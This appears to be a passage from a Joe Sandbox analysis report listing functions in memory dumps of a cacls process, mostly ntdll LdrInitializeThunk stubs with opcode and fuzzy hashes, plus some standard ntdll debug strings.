                                                                                                                                                                                                                                  control_flow_graph 281 3782bc0-3782bcc LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: bce56ddd01f56958b775f569a68fe4a10325f270e8201d0ed4809ba246b73d9c
                                                                                                                                                                                                                                  • Instruction ID: a23413b9d5cb154675451b1e89f4819564fd87388dce1257ee1622f5d59bced1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bce56ddd01f56958b775f569a68fe4a10325f270e8201d0ed4809ba246b73d9c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7390023122100812F900A5986508A46000587E2301F51D6A6A5018555EC77588917132
                                                                                                                                                                                                                                  Function 03782B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 280 3782b90-3782b9c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 4eb5e6cb5dc9238f0903d664d57f4dac2d7c5ff853e7603e23a46eda4c1432b7
                                                                                                                                                                                                                                  • Instruction ID: 3f20c8ca28b388d70975e73de6bf41ad11c7967875499055a973530f78f2850d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4eb5e6cb5dc9238f0903d664d57f4dac2d7c5ff853e7603e23a46eda4c1432b7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E90023122108C12F910A1589504B4A000587D2301F55CAA6A4418658DC7A588917132
                                                                                                                                                                                                                                  Function 03782B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 279 3782b80-3782b8c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: cef5a82616edc2a67578e163b35a2dd27fcf702ffa8187cdabedd59942ec7085
                                                                                                                                                                                                                                  • Instruction ID: 57a14c64f2db4d04c70bf826ecb4b84739ba35c1d53ccb11a1ef50c3d2234de2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cef5a82616edc2a67578e163b35a2dd27fcf702ffa8187cdabedd59942ec7085
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F90023122100C52F900A1585504F46000587E2301F51C6ABA0118654DC725C8517532
                                                                                                                                                                                                                                  Function 03782A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 274 3782a10-3782a1c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 5c9c08d8ef4cdfc51e18762caf31ab80f4abcb5f9b87d6447abca6e584153c09
                                                                                                                                                                                                                                  • Instruction ID: bc299e879e439814a6dc728b3d65dbc34d10111bade6a0fe2c297ebe0220370d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c9c08d8ef4cdfc51e18762caf31ab80f4abcb5f9b87d6447abca6e584153c09
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7900225231004122945E558170490B044597D7351391C6AAF140A590CC73188657332
                                                                                                                                                                                                                                  Function 03782AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 276 3782ac0-3782acc LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: bb59fbab2267e0ae29d50e143d2d3c0608c7212cc16fb04fe0d4e1eff0d64968
                                                                                                                                                                                                                                  • Instruction ID: 71674c579dd9ba38ce7b9be25d02fc8bf0979282f0901ed05bf7de52a9c56504
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb59fbab2267e0ae29d50e143d2d3c0608c7212cc16fb04fe0d4e1eff0d64968
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC90023162500C12F950B1585514B46000587D2301F51C6A6A0018654DC7658A5576B2
                                                                                                                                                                                                                                  Function 03782A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 275 3782a80-3782a8c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: e38f49889c24ca803ac81be1a0739659436e8ca3f4a7a3961a29f19619dad1b3
                                                                                                                                                                                                                                  • Instruction ID: 4a532ad63c1e90a323c52313f8fd0b8b0f7f50ec1a98d38e095131938bacd635
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e38f49889c24ca803ac81be1a0739659436e8ca3f4a7a3961a29f19619dad1b3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71900261222004136905B1585514A16400A87E2201B51C6B6E1008590DC63588917136
                                                                                                                                                                                                                                  Function 037829F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 273 37829f0-37829fc LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 30bde5d5e043a16abb9a56a568ece90cdff6eab27de49bc8cd0bb36247a91893
                                                                                                                                                                                                                                  • Instruction ID: d9ca57f858dc94f6d66b060e090646ca794c8c2b8f8ce9caa5933855a98877b4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30bde5d5e043a16abb9a56a568ece90cdff6eab27de49bc8cd0bb36247a91893
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F900225231004132905E5581704907004687D7351351C6B6F1009550CD73188617132
                                                                                                                                                                                                                                  Function 03782F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 463b744e4b0b47af34a110f6c0feb081116463a0246a817ea24e7771053a6769
                                                                                                                                                                                                                                  • Instruction ID: dc218e8eb01e549f404874ac31788dcf78aa9b617033cb04a6835eb8236ddb98
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 463b744e4b0b47af34a110f6c0feb081116463a0246a817ea24e7771053a6769
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B90022123180452FA00A5685D14F07000587D2303F51C7AAA0148554CCA2588617532
                                                                                                                                                                                                                                  Function 03782E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: e011e138cce9e045414cb53cc41be790717b1b98ba4edc7679cd47f9fc40cb8f
                                                                                                                                                                                                                                  • Instruction ID: 168bd83a1e0f38893e67f6e2cd4eaef492fdd8b491d92f23b860988e0a9aae9c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e011e138cce9e045414cb53cc41be790717b1b98ba4edc7679cd47f9fc40cb8f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0190026136100852F900A1585514F060005C7E3301F51C6AAE1058554DC729CC527137
                                                                                                                                                                                                                                  Function 03782D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 284 3782d10-3782d1c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 38d81a553d1e3d33eab99e33f6a521637a24d3c7fa777a6b9802e612027ccdce
                                                                                                                                                                                                                                  • Instruction ID: fc1b9587eed1e1e6f2dbdde7ce7940468c885fffb799e2fa5eca347ddce68904
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38d81a553d1e3d33eab99e33f6a521637a24d3c7fa777a6b9802e612027ccdce
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6490023122100823F911A1585604B07000987D2241F91CAA7A0418558DD7668952B132
                                                                                                                                                                                                                                  Function 03782C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 282 3782c30-3782c3c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 1aa16a468fd52f6eb64a1ac4014d3309134d68342728d03b5c2a058ec6635735
                                                                                                                                                                                                                                  • Instruction ID: b36ea6271b204ea917b1008b7f8b13a23af68a699207607b0e5f99daf3be558e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1aa16a468fd52f6eb64a1ac4014d3309134d68342728d03b5c2a058ec6635735
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F390022923300412F980B1586508A0A000587D3202F91DAAAA0009558CCA2588697332
                                                                                                                                                                                                                                  Function 03782CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 283 3782cf0-3782cfc LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 90ef4ba2e6286a7dc54debbdd0ba583fdd92e159b32be0e4427153fc27220377
                                                                                                                                                                                                                                  • Instruction ID: ee43f31a663ed856a91ada8d7aa96b612230962bf82901e477572e077511f7c2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90ef4ba2e6286a7dc54debbdd0ba583fdd92e159b32be0e4427153fc27220377
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94900221262045627D45F1585504907400697E2241791C6A7A1408950CC6369856F632
                                                                                                                                                                                                                                  Function 03782B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 269 3782b2a-3782b2f 270 3782b3f-3782b46 LdrInitializeThunk 269->270 271 3782b31-3782b38 269->271
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 0b39c8ad8e7b7cd2434985af4f71e477ef5d76e0755421eeba68d547e3736ae4
                                                                                                                                                                                                                                  • Instruction ID: dca020b76b35e9ea5581e35856286057688ec0fbbea152c0f22c81889ab6fbea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b39c8ad8e7b7cd2434985af4f71e477ef5d76e0755421eeba68d547e3736ae4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAB02B318020C4C5FE00E720070CB073D0067C1301F15C5E2D1020280F8338C080F132
                                                                                                                                                                                                                                  Function 02E17455 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182788854676.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2e00000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0f8c8a6c53fd1db66a41f1c260b2c0d689f48431a85abd57fd6f06673ad15012
                                                                                                                                                                                                                                  • Instruction ID: 03dd6b7a336daf5a7130827c824d1ef1fba9cac44895e0bf49f9571e2be75cdf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f8c8a6c53fd1db66a41f1c260b2c0d689f48431a85abd57fd6f06673ad15012
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1E0262B6AC1408687069B7944826C0FFE6DA9E60531C12ADC8DBC6729E292C80696C5

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 03777550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 037B4507
                                                                                                                                                                                                                                  • ExecuteOptions, xrefs: 037B44AB
                                                                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 037B4530
                                                                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 037B4460
                                                                                                                                                                                                                                  • Execute=1, xrefs: 037B451E
                                                                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 037B454D
                                                                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 037B4592
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                                                                  • Opcode ID: 3dfcdd2328ff4c942052003454a022f3801ae8c15eed6c5da67b411add15c703
                                                                                                                                                                                                                                  • Instruction ID: f94a8255c79173bcef451e2432c8ec92171c57cfc0bac9eeb44775f74fdd2ca5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3dfcdd2328ff4c942052003454a022f3801ae8c15eed6c5da67b411add15c703
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F51F771A40359BADF24EBA9DC89FFD77B8AF08740F0804E9D505AB181EB709A45CF61
                                                                                                                                                                                                                                  Function 03749046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                                                                                                  • Opcode ID: c1b6ade4e95227299550e91edd6be8958d931dd6b656cc33fcb46a110da81858
                                                                                                                                                                                                                                  • Instruction ID: 0df7de47ad2f0c64393fb80b264101507077153c0fe1beb7f2af083effb0ec69
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1b6ade4e95227299550e91edd6be8958d931dd6b656cc33fcb46a110da81858
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C815A71D002699BDB35CF54CC44BEEB6B8AF49700F0446EAEA09B7250E7709E80DFA0